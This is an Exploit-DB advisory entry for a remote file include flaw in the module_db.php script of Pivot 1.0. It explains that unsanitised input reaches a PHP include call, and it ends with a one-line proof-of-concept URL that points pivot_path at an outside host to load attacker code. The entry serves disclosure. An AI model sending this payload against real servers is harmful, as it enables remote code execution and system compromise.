Pivot 1.0 - Remote module_db.PHP File Include Vulnerability

2004-06-15T00:00:00
ID EDB-ID:24212
Type exploitdb
Reporter loofus
Modified 2004-06-15T00:00:00

Description

Pivot 1.0 Remote module_db.PHP File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/10553/info

It has been reported that Pivot is affected by a remote file include vulnerability contained within the module_db.php script. This issue is due to a failure of the application to properly sanitize user-supplied input before including it as a parameter to a file include function call.

This issue may be exploited to force the affected application to execute attacker supplied PHP script code. This may allow for command execution on the underlying system as well as other attacks.

http://www.example.com/pivot/modules/module_db.php?pivot_path=http://www.example.org/